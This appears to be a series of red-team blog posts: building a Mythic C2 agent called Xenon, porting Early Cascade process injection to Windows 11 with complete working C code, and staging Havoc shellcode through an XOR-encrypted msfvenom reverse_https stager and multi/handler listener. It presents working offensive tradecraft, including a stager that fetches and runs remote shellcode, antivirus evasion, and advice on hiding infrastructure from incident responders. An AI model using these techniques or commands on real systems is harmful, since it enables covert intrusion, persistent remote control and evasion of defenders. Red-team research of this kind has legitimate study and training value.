GET request traffic from agent

For simplicity, I decided that payload messages over 1kb will use POST and anything under will be a GET request. This ends up meaning that all regular checkins and any tasks with small outputs will be sent as GETs.

Any task with a response larger than 1kb will be sent using an HTTP POST request. Below we can see the HTTP request with the message payload in the body of the request.

POST request traffic from agent

Raw POST request traffic

Limitations

There are currently a few limitations to the malleable C2 profiles:

~~As of 11/27/24 the httpx C2 profile doesn’t allow for multiple URIs connection strings.~~
POST requests
- Payload can only be in the body (due to size restrictions for URL parameters)
GET requests (as of 11/27/24)
- arbitrary host header values haven’t been implemented
Server response message location must be in body (default)

Thoughts

I really wanted to support the httpx C2 profile since not many Mythic C2 agents are currently supporting this C2 protocol.

During the development process I learned a lot about memory management and the details of how to modify a web request when using Wininet. I restarted from scratch three times, until I found a very good example that I “repurposed” a lot of the code from.

There are still aspects of the httpx C2 profile that are not supported in Xenon, but I plan to add them so it is fully implemented.

Next I wanted to really make this agent a bit more useful and exponentially expand it’s abilities. The fastest way I could think to do this was to implement a COFF loader so that it could execute post-exploitation BOF files.

Part 5: Cough Cough

Part 3: Doing a Task

c0rnbread — Tue, 11 Mar 2025 16:14:28 GMT

Mythic request types (checkin & get_tasking & post_response)

Getting Tasks

Now that we performed an initial check-in to the teamserver, we (the agent) need to continuously check for new tasks to execute. In Mythic this can be done with a get_tasking request. The format for this style of request looks like this:

Base64( CallbackUUID + JSON(
{
	"action": "get_tasking",
	"tasking_size": 1, //indicate the maximum number of tasks you want back
	//if passing on messages for other agents, include the following
	"delegates": [
		{"message": agentMessage, "c2_profile": "ProfileName", "uuid": "uuid here"},
		{"message": agentMessage, "c2_profile": "ProfileName", "uuid": "uuid here"}
	],
		"get_delegate_tasks": true, //optional, defaults to true
	}
)
)

We don’t need to worry about the delegates section for now since we are just asking for basic tasks.

The data gets parsed by the translation container and sent to the get_tasking_to_mythic_format() function which returns JSON to the Mythic server. It just contains the number of tasks the agent wants from the server.

def get_tasking_to_mythic_format(data):
    """
    Parse get_tasking message from Agent and return JSON in Mythic format.
    """
    numTasks = int.from_bytes(data[0:4])
    mythic_json = { 
            "action": "get_tasking", 
            "tasking_size": numTasks 
        }
    return mythic_json

The response from the Mythic server gets sent again through our translation container and the data forwarded to our get_tasking_to_agent_format() function. This function packs task data in the following order:

get_tasking_hex_byte + (task_hex_byte + task_uuid + task_arguments)

If there were any tasks submitted from the operator, then the function packs the data and sends the response to the agent.

Post Response

The post_response request type can be thought of as submitting results from an agent task. This request is formatted as follows.

Base64( CallbackUUID + JSON(
{
	"action": "post_response",
	"responses": [
		{
			"task_id": "uuid of task",
			... response message (see below)
		},
		{
			"task_id": "uuid of task",
			... response message (see below)
		}
	], //if we were passing messages on behalf of other agents
	"delegates": [
		{"message": agentMessage, "c2_profile": "ProfileName", "uuid": "uuid here"},
		{"message": agentMessage, "c2_profile": "ProfileName", "uuid": "uuid here"}
		]
 }
 )
)

Again, I’m not worried about delegates just yet, that's for more advanced agent functionality like pivots or links.

So the specific task that was executed will either send a package Success or Error message. I decided to indicate the type of response at the end of the package with a single byte (0x99 or 0x95).

This seems to work okay for now, but I’m totally open to suggestions.

Therefore, the post_response packet coming from the agent will look like this.

# Successful
callback_uuid + (post_repsonse_hex_byte + task_id + (size_of_task_data + task_data) + success_byte)
# Error
callback_uuid + (post_repsonse_hex_byte + task_id + win_error_code + error_byte)

My translation container function post_response_to_mythic_format() accepts this binary packet and extracts out the information to assemble the JSON that Mythic expects above. If the Status Byte indicates an error from the agent, then it will lookup the 32 bit integer for the Windows error code against a dictionary and return that output to the operator console.

if status == "error":
        error = ERROR_CODES.get(error_code, {"name": "UNKNOWN_ERROR", "description": f"Error code {error_code}"})
        user_output += f"[!] {error['name']} : {error['description']}\\n"

In most cases I don’t care about the Mythic response from a post_response requests. The agent sends the results from a task in a post_response, the translation container converts it, and Mythic displays the output to the operator.

Finally, using the translation container I added a default user_output string that is similar to Cobalt Strike because it makes me feel cool.

Here is example output from the pwd command.

Getting output from a task

Next Steps

At this point I had built out the foundation to be able to request and execute tasks. One of my main goals when starting this project was to support the Httpx C2 profile to allow for malleable C2 profiles. In the next blog I will discuss the implementing this.

Part 4: Getting an Upgrade

Part 2: Getting a Callback

c0rnbread — Tue, 11 Mar 2025 15:54:58 GMT

translation containers and checking in

Agent

Data Serialization

I decided to build off of the Talon agent by @Cracked5pider. It uses a data serialization format “type, size, data” to pack and parse data. This allows the agent to send serialized binary data instead of worrying about creating JSON in C which would have been a nightmare and require pulling in different libraries.

For example, a binary packet of the string “Xenon” sent from the agent might look like this in hexadecimal representation:

\\x02\\x00\\x00\\x00\\x05\\x58\\x65\\x6e\\x6f\\x6e

\\x02 - one byte for the message type
\\x00\\x00\\x00\\x05 - a 4 byte integer for the size of the data
\\x58\\x65\\x6e\\x6f\\x6e - the actual data itself (”Xenon”)

This can then be parsed on the server side and processed as needed.

Translation Plz?

So that's all cool and everything… but the Mythic server expects JSON. In order for Mythic to understand these packets of data I had to use what Mythic calls a translation container.

Yes… another container. 🫠

It sits in the middle of the agent and server, and it translates the data into the necessary format.

From Agent → C2: Translates to JSON

From C2 → Agent: Translates to type, size, data serialized format

This is a simplified overview of how the translation container works for Xenon:

Translation container overview

The folder for the translation container is located under Xenon/Payload_Type/xenon/translator. It defines a XenonTranslator class which defines two asynchronous functions for translate_to_c2_format and translate_from_c2_format , which do exactly what they say.

Mythic has a few different task types that we care about for now:

checkin - Initial agent check-in data (hostname, username, pid, etc)
get_tasking - Asking for any tasks to execute
post_response - Results from task executions

The task type is defined in the JSON of the request type. The easiest way to represent these different task types in the binary format would be with a single byte:

0xf1 - checkin task type
0x00 - get_tasking task type
0x01 - post_response task type

This single byte can be correlated to the task type on the Translation Container. We can read off the first byte to know what type of task we received and then handle the message payload accordingly.

MYTHIC_CHECK_IN = 0xf1
MYTHIC_GET_TASKING = 0x00
MYTHIC_POST_RESPONSE = 0x01

Check-In

The first data transmitted from the agent should be the checkin message. This usually contains a bunch of metadata about the victim host (hostname, OS, username, IP address, etc). The different nuances to this is covered in detail in the Mythic documentation.

Check-in message format:

Base64( PayloadUUID + JSON({
    "action": "checkin", // required
    "uuid": "payload uuid", //uuid of the payload - required
    "ips": ["127.0.0.1"], // internal ip addresses - optional
    "os": "macOS 10.15", // os version - optional
    "user": "its-a-feature", // username of current user - optional
    "host": "spooky.local", // hostname of the computer - optional
    "pid": 4444, // pid of the current process - optional
    "architecture": "x64", // platform arch - optional
    "domain": "test", // domain of the host - optional
    "integrity_level": 3, // integrity level of the process - optional
    "external_ip": "8.8.8.8", // external ip if known - optional
    "encryption_key": "base64 of key", // encryption key - optional
    "decryption_key": "base64 of key", // decryption key - optional
    "process_name": "osascript", // name of the current process - optional
    })
)

Mythic check-in request format

So we can basically reformat this message but in a binary serialized format. It would look something like this:

Base64( PayloadUUID bytes + 0xf1 + uuid bytes + IP address bytes + OS bytes + etc + etc)

Our check-in format

Then on the Translation Container side, we read the data in the expected order, parse it, and format it into JSON to pass to the Mythic server.

Xenon calls a bunch of Windows APIs in order to collect the information above from the host, then it packs the data into the serialized format, prepends the payload UUID string, base64 encodes the whole thing and sends it off.

Check-in response format:

Base64( PayloadUUID + JSON({
    "action": "checkin",
    "id": "UUID",        // New UUID for the agent to use
    "status": "success"
    })
)

Mythic check-in response format

The new UUID must be used for all agent requests going forward. In the agent code there is a simple function to replace the global agent UUID with the new one.

Agent check-in!

If all goes well, you will see the new callback under Active Callbacks.

Next Steps

So all we’ve done here was send the “check-in” request which sends some metadata about the victim host and registers the callback within Mythic.

In order to actually be a C2 agent, we need to continuously loop over the “get-tasking” request and process and relevant data returned from it. I’ll cover that process in the next blog.

Part 3: Doing a Task

Part 1: Creating Mythic C2 Agent

c0rnbread — Tue, 11 Mar 2025 15:43:31 GMT

Mythic landscape, motivations, and overview

Intro

This is a development blog series that goes along with my experience in creating a Mythic C2 agent written in C. This is not supposed to be a step-by-step tutorial, but rather a written log of what I’ve learned. I will include code snippets for the sake of reinforcing what I’ve learned along the way.

I hope this can be of help to anyone looking into creating their own agent.

Why

I decided to start my own C2 agent for a variety of reasons, here are a few:

The main reason: To improve my development skills in C and low-level memory management concepts.
More thoroughly understand the architecture of C2 agents in general.
And because I was surprised I couldn’t find any open-source Mythic agents written in C (before @silentwarble released Hannibal).

Objectives

Many people that write custom C2 agents never open-source them to try and stay ahead of the cat-and-mouse game that is evasion. This being my first custom agent, I have no issue open-sourcing it since its not even close to opsec-safe already.

This project had a few objectives which included learning and implementing the following:

Keep the agent memory-safe and avoid crashing like the plague
Optional command inclusion to reduce binary size
Traffic flexibility with malleable C2 profiles similar to Cobalt Strike
Open-source the project to take input from the community

Mythic

Now that we got that out of the way we can talk about Mythic. I will try to give a high-level overview of what the Mythic framework is and how it works, or at least what you need to know to start developing a custom agent.

If you are not familiar, Mythic is a Command and Control framework, but it is not like many other C2 frameworks. Almost everything in Mythic is modular and modifiable. All of the components are separated into Docker containers including: server, logging, transport profiles, and yes… the agents.

This makes it a good choice if you want to hop in and start developing a C2 agent but don’t want to worry about creating or maintaining a backend/frontend server.

However, this does mean that you have to learn how the payload containers speak to the rest of the framework.

The development process was a bit confusing at first, but I started to understand everything (or at least what I needed to) after a few days of playing around. Luckily, the developer @its_a_feature_ maintains very good documentation which helped me figure out most of it.

Pretty simple right? 🫠

I began by reading through the source code of different agents on the official Mythic Agents GitHub page. This gave me a pretty good starting place and got me familiar with the Payload Container format. Also I read through the ExampleContainers repository which outlined the file format.

Starting Out

There is one really important thing I had to decide before I could do anything… pick a cool edgy name for the project.

“Xenon?”

“Yeah, nice.”

Ok, moving on now…

Development Environment

The development environment I setup consisted of a Linux host running the Mythic server from /home/mythic/Mythic and then my project folder at /home/mythic/Xenon . Each time changes are made to any Python or container files, I would reinstall the project from the directory.

mythic@teamserver-mythic:~/Mythic$ sudo ./mythic-cli install folder ../Xenon/

This was kind of annoying, but if you are just modifying the agent code you probably don’t have to reinstall from the folder each time.

If you have a better way to setup your dev environment, please let me know.

Structure

I created a C project structure under Xenon/Payload_Type/xenon/xenon/agent_code . I chose mingw-w64 as the compiler since I was most familiar with it and I would be cross-compiling targeting Windows (assuming Mythic server is running on Linux).

agent_code
├── Include
│   └── Xenon.h
├── Makefile
└── Src
    └── Xenon.c

This is where the actual agent code is compiled from inside of the Payload Container.

Builder Dot Pie🥧

The builder.py is a very important file that is located at Xenon/Payload_Type/xenon/xenon/mythic/agent_functions/builder.py .

It is called every time an operator goes through the Generate New Payload dialog.

It handles the parsing of the selected build settings, compilation of the agent, frontend updates, and build logging. It defines a class XenonAgent which describes some metadata for the Xenon agent and contains an asynchronous build function.

If no errors are encountered, then the compiled executable will become available for download in the Mythic UI.

With that working I moved onto the real development.

Part 2: Getting a Callback

Early Cascade Injection

c0rnbread — Thu, 19 Dec 2024 02:08:00 GMT

learning about early cascade injection, fixing for Win11, disassembly nonsense

Intro

Early Cascade injection was documented by Outflank as a novel process injection technique. The technique requires locating and modifying specific symbols in the .data and .mrdata sections of ntdll.dll in a remote process, which enables code execution via a callback routine.

This blog post will not go into all of the details of the technique, since it was covered in the original research blog post.

Instead, this blog post will cover how I played with the proof-of-concept code from @5pider and reversed a method to find offsets needed to execute on Windows 11 targets.

Here is my very simplified overview of the steps performed during the injection method:

Spawn a process in a suspended state.
Locate the offsets to g_ShimsEnabled & g_fnSE_DllLoaded inside of ntdll.dll.
Set g_ShimsEnabled boolean to 1 (true) in the suspended process.
Overwrite the function pointer for g_fnSE_DllLoaded with the address of shellcode stub.
Resume the thread.
Shellcode stub immediately flips g_ShimsEnabled back to false (0).
Shellcode stub queues an APC routine which executes after LdrInitializeThunk routine.

Finding Offsets

A crucial step for this injection technique is the ability to locate the addresses of:

g_ShimsEnabled boolean value
g_fnSE_DllLoaded function pointer

g_pfnSE_DllLoaded is located in the .mrdata section and g_ShimsEnabled is in the .data section of ntdll.dll.

I found this helper function on Twitter from @m4ul3r_0x00 to help locate the memory addresses of those values in order to modify them later.

VOID FindOffsets()
{
    PBYTE ptr;
    ULONG offset1, offset2;
    int i = 0;

    // Get the starting address
    ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
    if (!ptr) {
        printf("[!] Failed to locate RtlQueryDepthSList\\n");
        return;
    }

    // Scan memory until end of LdrpInitShimEngine (0xC3CC pattern)
    while (i != 2) {
        if (*(PWORD)ptr == 0xCCC3) {
            i += 1;
        }
        ptr++;
    }

    // Scan memory until 0x488B3D pattern (mov rdi, qword [rel g_pfnSE_DllLoaded])
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
        ptr++;
    }

    // [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
    offset1 = *(PULONG)(ptr + 3);               // Add 3 bytes to get to [rel g_pfnSE_DllLoaded]
    g_pfnSE_DllLoaded = ptr + offset1 + 7;      // Find absolute address of g_pfnSE_DllLoaded (8 bytes)

    // Scan memory until 0x443825 pattern (cmp byte [rel g_ShimsEnabled], r12b)
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x253844) {
        ptr++;
    }

    // [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
    offset2 = *(PULONG)(ptr + 3);           // Add 3 bytes to get to [rel g_ShimsEnabled]
    g_ShimsEnabled = ptr + offset2 + 7;     // Find absolute address of g_ShimsEnabled (8 bytes)
}

Here is a breakdown of the function:

Finding g_pfnSE_DllLoaded
- The first while loop tries to move the pointer to the end of the LdrpInitShimEngine function by matching the byte pattern for the end of a function 0xC3CC. (it’s reversed because little-endian)
- Then the next while loop searches for the next byte pattern which matches the instructions mov rdi, qword [rel g_pfnSE_DllLoaded], but only matches the first 3 bytes 0x488B3D by using the mask 0xFFFFFF.
- It determines the index pointer is now only 3 bytes away from the relative address of g_pfnSE_DllLoaded.
- So add 3 bytes to the current index to land at [rel g_pfnSE_DllLoaded] , then you can calculate the absolute address of g_pfnSE_DllLoaded.

// [ptr is here now] mov rdi, qword [rel g_pfnSE_DllLoaded]
offset1 = *(PULONG)(ptr + 3);               // Add 3 bytes to get to [rel g_pfnSE_DllLoaded]
g_pfnSE_DllLoaded = ptr + offset1 + 7;      // Find absolute address of g_pfnSE_DllLoaded (8 bytes)

Finding g_ShimsEnabled
- Then the last while loop searches for the byte pattern which matches the instructions cmp byte [rel g_ShimsEnabled], r12b (remember this for later 😉).
- After it finds the pattern it does the same as above and calculates the absolute address of g_ShimsEnabled

// [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
offset2 = *(PULONG)(ptr + 3);           // Add 3 bytes to get to [rel g_ShimsEnabled]
g_ShimsEnabled = ptr + offset2 + 7;     // Find absolute address of g_ShimsEnabled (8 bytes)

After the memory addresses for these global symbols are located the rest of the cascade injection technique can continue.

The Problem

This code worked fine when I tested on Windows 10, but failed on Windows 11 😢.

I decided to try and ‘fix’ this to also work on Windows 11.

My hypothesis:

The memory signatures inside of ntdll.dll in this PoC are probably not exactly the same on Windows 11, so the code fails to locate either g_ShimsEnabled or g_pfnSE_DllLoaded or both.

Let’s Fix It ⚒️

In order for this injection method to work on Windows 11 we have to reproduce the methodology above or come up with a more reliable method of locating the addresses.

Debugging NTDLL.DLL

So I loaded ntdll.dll into Binary Ninja on a Windows 11 machine with debug symbols to start analyzing the PE file.

As you saw in the function above, it first gets the address of the exported function RtlQueryDepthSList.

// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
if (!ptr) {
    printf("[!] Failed to locate RtlQueryDepthSList\\n");
    return;
}

In Binja we can browse to the Symbols tab to view all functions since we have debug symbols included in the DLL. I searched for the symbol of function and clicked into it to start analyzing it.

Great, next the PoC counted down 2 functions by looking for ret instructions (0xC3CC).

// Scan memory until end of LdrpInitShimEngine (0xC3CC pattern)
while (i != 2) {
    if (*(PWORD)ptr == 0xCCC3) {
        i += 1;
    }
    ptr++;
}

The code was nicely commented, so I knew it expected the pointer to land at the end of LdrpInitShimEngine after this.

Wait! In the screenshot above you can see the 3rd function down is RtlAllocateAndInitializeSid not LdrpInitShimEngine.

The functions in ntdll.dll appear to be in a different order on Windows 11. At least now we know where to begin…

Reversing Original PoC

First I needed to figure out why the PoC chose the end of LdrpInitShimEngine as the function to stop after.

I determined it was chosen because the next function was supposed to be LdrpLoadShimEngine which contains two VERY important instructions in it:

mov rdi, qword [rel g_pfnSE_DllLoaded]
cmp byte [rel g_ShimsEnabled], r13b

LdrpLoadShimEngine references both of the variables we need by their relative addresses. This means that we can grab those addresses and calculate their absolute addresses in memory.

This is what the function for Win10 does.

So I basically stuck with the original PoC’s methodology to get it working for Win11.

The function will do the following:

Find the closest exported function to LdrpLoadShimEngine.
Get the address of that exported function.
Move the index pointer ‘x’ number of ret's until it’s at LdrpLoadShimEngine.
Look for the byte pattern that references the variable’s relative address’s.
Calculate their absolute address’s.
Finish the injection steps.

Find the Closest Exported Function

The ntdll.dll library has many exported and non-exported functions. For any exported function we could simply use GetProcAddress in order to get a pointer to the function. But since LdrpLoadShimEngine is not an exported function we have to find the closest exported one and then count forwards (or backwards).

We can start at LdrpLoadShimEngine and count backwards until we see an exported function.

Six (6) ret’s above we can see RtlUnlockMemoryBlockLookaside which is an exported function, meaning we can easily get the address to it with GetProcAddress.

Now we can update our code to use RtlUnlockMemoryBlockLookaside as the starting function and count 6 ret’s down to find LdrpLoadShimEngine.

// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
if (!ptr) {
    printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\\n");
    return;
}

// Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
while (i != 6) {
    if (*(PWORD)ptr == 0xCCC3) {
        i += 1;
    }
    ptr++;
}

Fixing Byte Signature

Now there is just one more thing to address. I found while analyzing LdrpLoadShimEngine that Win11 uses a different register for the cmp instruction.

// Windows 10
cmp     byte [rel g_ShimsEnabled], **r12b**
// Windows 11
cmp     byte [rel g_ShimsEnabled], **r13b**

Win10 uses r12b but Win11 uses r13b. This means that the pattern matching logic from the PoC will fail to find the correct address since the bytes are different.

We can easily update the code to check for 0x44382D instead of 0x443825.

while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
    ptr++;
}

Final Thoughts

After making those changes to the function I was able to successfully execute the injection method on Windows 11.

The final updated function looks like this:

// Values to overwrite in NTDLL
PVOID g_pfnSE_DllLoaded = NULL;
PVOID g_ShimsEnabled = NULL;

/*
* Locate g_ShimsEnabled and g_pfnSE_DllLoaded on Windows 11 
*/
VOID FindOffsetsWin11()
{
/*
    On Windows 11, functions are ordered differently inside ntdll.
    We want to find RtlUnlockMemoryBlockLookaside because it's the closest exported function to
    LdrpLoadShimEngine (which contains the instructions we want).
*/
    PBYTE ptr;
    ULONG offset1, offset2;
    int i = 0;

    // Get the starting address
    ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
    if (!ptr) {
        printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\\n");
        return;
    }
    
    // Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
    while (i != 6) {
        if (*(PWORD)ptr == 0xCCC3) {
            i += 1;
        }
        ptr++;
    }

    /*
        Should locate byte pattern inside of LdrpLoadShimEngine.
        Looking for 0x488B3D  (mov     rdi, qword [rel g_pfnSE_DllLoaded])
    */
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
        ptr++;
    }

    // [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
    offset1 = *(PULONG)(ptr + 3);               // Add 3 bytes to get to [rel g_pfnSE_DllLoaded]
    g_pfnSE_DllLoaded = ptr + offset1 + 7;      // Find absolute address of function pointer g_pfnSE_DllLoaded (8 bytes)

    /*
        Should locate byte pattern inside of LdrpLoadShimEngine.
        Looking for 0x44382D  (cmp     byte [rel g_ShimsEnabled], r13b)
    */
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
        ptr++;
    }

    // [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
    offset2 = *(PULONG)(ptr + 3);           // Add 3 bytes to get to [rel g_ShimsEnabled]
    g_ShimsEnabled = ptr + offset2 + 7;     // Find absolute address of g_ShimsEnabled (8 bytes)
}

Improvements

I had the AI wizard generate me a function to determine the Windows version then execute the correct FindOffsets function.

Some improvements to this code could be:

Avoid suspicious WinAPI calls (GetProcAddress, GetModuleHandleA, WriteProcessMemory, ResumeThread)
More reliable method of locating the symbols in NTDLL

The final code can be found on my GitHub here.

Credits

Original research - https://www.outflank.nl/blog/2024/10/15/introducing-early-cascade-injection-from-windows-process-creation-to-stealthy-injection/
PoC from 5pider - https://github.com/Cracked5pider/earlycascade-injection
function to find symbols from @m4ul3r_0x00 https://x.com/m4ul3r_0x00/status/1856362500310143174

Red Teaming Tactics: Unlocking The Power of Custom Staged Payloads w/ Metasploit

c0rnbread — Fri, 29 Nov 2024 20:34:47 GMT

Overview

The purpose of this article is to go over the benefits of staged payloads and show a modular approach to staging payloads with Metasploit. This is definitely nothing new or ground breaking, but just a real hands-on walkthrough of how to utilize their ‘custom’ payloads with a Command & Control framework of your choosing.

Definitions

When discussing topics with a lot of moving parts, I’ve found it’s essential to define each item beforehand. Below are a list of items that will be referred to throughout the rest of the article.

Loader - A modular program who’s purpose is to evade detections and execute shellcode. Usually the only file to touch disk.
Stager - A smaller piece of code that executes with the purpose of preparing or fetching another piece of code.
Agent - In this scenario also called second stage payload. The shellcode, EXE, or DLL that is provided by the C2 framework.
Stage listener - A server who’s purpose is to serve the second stage payload.
C2 Server - The server running the chosen C2. The operator conducts post-exploitation through this server after successful execution.

DIY Stage

Staged payloads are useful because they allow the operator to use a small piece of position-independent code in their initial stager. Without staged payloads, the operator may be left trying to work a stager payload larger than 5kb sometimes up to 17mb (sliver 😕) into their initial loader. Sometimes the bigger the better … but in this case we want to create a small initial stager that pulls down the full agent (Havoc in this case) after execution.

To Stage or Not to Stage?

Sometimes the chosen C2 framework has support for staged payloads like with Sliver or Meterpreter, but what if it doesn’t? You might be left with a raw shellcode file upwards of 90kb. For reference here is a 691 byte stager payload inside of a Loader:

691 byte array in loader

Now imagine trying to fit a 90kb payload, 133x the size of this, into a Visual Studio project! Ain’t gonna happen… There are other OPSEC reasons you don’t want to just embed the entire agent into the loader.

Setting Up A Custom Stage

We will use Metasploit’s windows/x64/custom/reverse_https payload as a small stager that will reach out and fetch a custom raw shellcode file. The shellcode file will be generated by the C2 of our choosing.

In this example, I will use Havoc C2. It has a nice GUI and some nice evasion tactics built into its default agent, Demon.

The Agent

Like I said, for this example I will use Havoc C2 for the agent which supports shellcode, Exe, Dll, and Service Exe. Save the raw shellcode from whatever C2 you are utilizing, this will be used in the Metasploit payload options later.

Generated C2 Agent Shellcode

The exported shellcode file sits around 94kb.

Havoc C2 Shellcode

The Loader

The details of the loader are out of the scope of this article but, ideally it should evade detection and sandboxes while executing modular shellcode. I will use a custom Dll loader that uses direct syscalls via Syswhispers3 and simple XOR obfuscation on the shellcode byte array. In my experience, this can be enough to get pretty low AV detection rates. Evading EDRs with kernel level hooking will require you to do more than this, but thats a story for another day.

The next step is to generate the Stager shellcode that will actually be placed into the Loader. I am going to use msfvenom to generate our small bit of shellcode that will connect back to our multi/handler listener later.

$ msfvenom -p windows/x64/custom/reverse_https LHOST= LPORT=8080 EXITFUNC=thread -f c --encrypt xor --encrypt-key 'StagingPayloadsLikeAPro?'

Using windows/x64/custom/reverse_https will make sure the connection to the Stage Listener is encrypted through TLS.

⚠️ Important:

LHOST - this will be the Stage Listener IP address, whether thats the same as the C2 or not (in this case it is).

--encrypt xor - will help to make sure the shellcode is not easily flagged as malicious by AV.

msfvenom command to generate Stager

This gives us a nice small payload Stager around 700 bytes. This is the shellcode that will be used inside of your actual loader. I will copy & paste it into my Visual Studio project and compile the Dll.

Lastly, we just need to prepare multi/handler to serve the second stage payload on the desired port. Obviously this port needs to be different than the C2 communication port if using the same server for both.

The Stage Listener

The Stage Listeners soul purpose is the serve up the second stage to the Stager and no-one else. This server can either be the same as the C2 server or different. Below are the requirements:

Internet facing IP address
Metasploit installed
Agent shellcode file

We will use the windows/x64/custom/reverse_https payload inside of multi/handler. Here are the modules basic options:

Module options (payload/windows/x64/custom/reverse_https):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   EXITFUNC        thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                            yes       The local listener hostname
   LPORT           8080             yes       The local listener port
   LURI                             no        The HTTP Path
   SHELLCODE_FILE                   no        Shellcode bin to launch

Let’s setup multi/handler . Move into the folder with your .bin file and setup the listener with the following options:

$ msfconsole -q
msf6 > use multi/handler
msf6 > payload windows/x64/custom/reverse_https
msf6 > exitfunc thread
msf6 > lhost 
msf6 > lport 8080
msf6 > shellcode_file demon.x64.bin
msf6 > exitonsession false

exitfunc thread - this will depend on how your Loader is executing the shellcode (default is process)

lhost - public facing IP of the Stage Listener

lport - port that was used when generating shellcode with msfvenom

shellcode_file - relative path to the shellcode file

exitonsession false - so the listener doesn’t turn off after one connection

These options can also be combined into a .rc file for convenience.

Starting Stage Listener

Now the server is waiting patiently to deliver the Havoc shellcode we generated.

Execution Chain

Here is a diagram to visualize the way the execution chain is unfolding. Notice the Dll loader only needs the small msfvenom stager we created, the rest is downloaded and executed in-memory. The agent is downloaded via HTTPS from the Stage Listener during execution. The Havoc agent is then executed in the memory space created by the stager and command and control is established.

Execution Flow Diagram

Now we’ll kick the tires in Windows 10 with Defender on. To test everything is working I’ll use rundll32.exe to load my Dll (which is not the most stealthy execution method for Dlls btw).

Load Dll with rundll32.exe

We can see the connection came in, and the server is sending the custom stage.

Stage Listener serving custom stage 2 (Havoc)

After the custom stage is executed we can see our callback in the Havoc GUI.

Beacon established

Final Thoughts

Although Metasploit has been heavily signatured by a vast number of security products, it can still be used today with modifications. Hopefully I’ve showed how you can take a given C2 framework and break up the loading of the agent into a staged payload. Metasploit is just one quick & easy way you can accomplish this. If your looking for something more home-grown you can write your own stage listener server in Python making it compatible with the custom shellcode, or write your own shellcode :( ).

Improvements

This was just a fun exercise to find a way to modularly swap different C2s into my existing workflow.

Encrypt/encode second stage payloads
Use a redirector server to hide the true location of C2/stage-listener
Add custom headers, user-agents, or URIs in multi/handler to prevent incident responders from investigating your infrastructure
Automation of stager setup

Resources

Havoc Framework - https://github.com/HavocFramework/Havoc

msfvenom custom payload - https://www.infosecmatter.com/metasploit-module-library/?mm=payload/windows/x64/custom/reverse_https

Sliver stage-listers - https://github.com/BishopFox/sliver/wiki/Stagers